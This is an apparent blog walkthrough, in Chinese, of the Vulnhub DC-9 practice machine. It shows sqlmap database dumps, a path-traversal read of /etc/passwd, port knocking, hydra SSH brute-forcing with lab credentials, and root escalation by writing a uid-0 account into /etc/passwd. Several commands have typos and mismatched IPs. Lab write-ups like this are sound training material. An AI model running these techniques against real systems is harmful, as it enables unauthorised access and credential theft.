Vulnhub靶场实战———DC9

环境下载

https://www.five86.com/downloads/DC-9.zip

环境配置 

 

信息获取 

 可以看到靶机开放了80端口以及22端口,我们先进入80端口看一下

获取flag

 成功进入

我们在search页面发现了一个输入框,我们随便输点东西

 我们猜测此页面含有SQL注入漏洞,我们去Sqlmap尝试一下爆破库

sqlmap.py -u "http://192.168.100.5/results.php" --datb "search=1" -dbs 

 爆破出两个库来,继续爆表

sqlmap.py -u "http://192.168.100.5/results.php" --data "search=1" -D users --tables

继续爆列

sqlmap.py -u "http://192.168.100.5/results.php" --data "search=1" -D users -T UserDetails --dump 

 获取到了一些用户名以及密码,接下来我们去爆破另一个Staff库

sqlmap.py -u "http://192.168.100.5/results.php" --data "search=1" -D Staff --tables  

 继续爆字段

sqlmap.py -u "http://19.168.100.5/results.php" --data "search=1" -D Staff -T Users --dump 

 得到密码,我们去登录一下看看

成功登录,但是页面中并没有什么有用的东西,但是我们发现了 

有个提示:File does not exist 显示文件不存在 通过测试 发现 可能是文件包含漏洞发现这里得用户和刚刚数据库里的用户有些一样的

http://192.168.100.5/welcome.php?file=../../../../etc/passwd

确实含有文件包含漏洞 

接下来不知道怎么搞了,去网上找了一些文章发现涉及到端口敲门的知识点

什么是端口敲门?:端口敲门服务 - 知乎

knockd 服务的默认配置路径:/etc/knockd.conf

 此时我们得到了 sequence,这个有用,先记下来

接下来去kali中安装一下

apt-get install knockd

然后进入配置文件进行编辑 vim /etc/knockd.conf 

将sequence改成刚才的三个数组

接下来就是端口敲门

使用命令:knock 172.16.5.117 7469 8475 9842

然后查看一下端口状态,可以发现22端口已经打开

sudo namp -p 22 192.168.100.5 

然后把刚刚sqlmap跑出来的账号和密码 新建两个字典 分别为user 和password

 

开始爆破

使用命令:hydra -L user.txt -P password.txt ssh://192.168.100.5

发现了三个用户分别是 joeyt Passw0rd 和janitor Ilovepeepee 和chandlerb UrAG0d 

使用命令:ssh joeyt@192.168.100.5 等三个用户都进行登入看看有没有什么隐藏的信息

最终在janitor 用户中 发现了一个隐藏文件.secrets-for-putin 

 查看获取到了一些新的用户密码信息 把刚刚获取的信息再次放入 刚刚的pssword字典 再次进行爆破

使用命令再次爆破

hydra -L user -P passwd ssh://192.168.100.5


发现一个新的用户: fredf /B4-Tru3-001 尝试登入,发现登入成功

 接下来就是提权操作,我们查看一下提权命令

sudo -l

进入cd /opt/devstuff/dist/test/查看发现test 是一个python 文件 

接下来我你们使用命令查找python文件并进行查看 

find / -name test.py 2>/dev/null 
cat /opt/devstuff/test.py

 这个函数大概的意思就是将参数 的内容写到参数 中然后生成一个用户

接下来我们先使用命令 创建一个admin的账号

openssl passwd -1 -salt admin 123456

 

然后再把/etc/passwd的格式修改一下 然后写入/tmp下面 

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd 

 

然后运行一下,再查看一下,最后su切换用户既可

sudo ./test /tmp/passwd.txt /etc/passwd
cat /etc/passwd
su admin

  成功获取FLAG,结束! 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值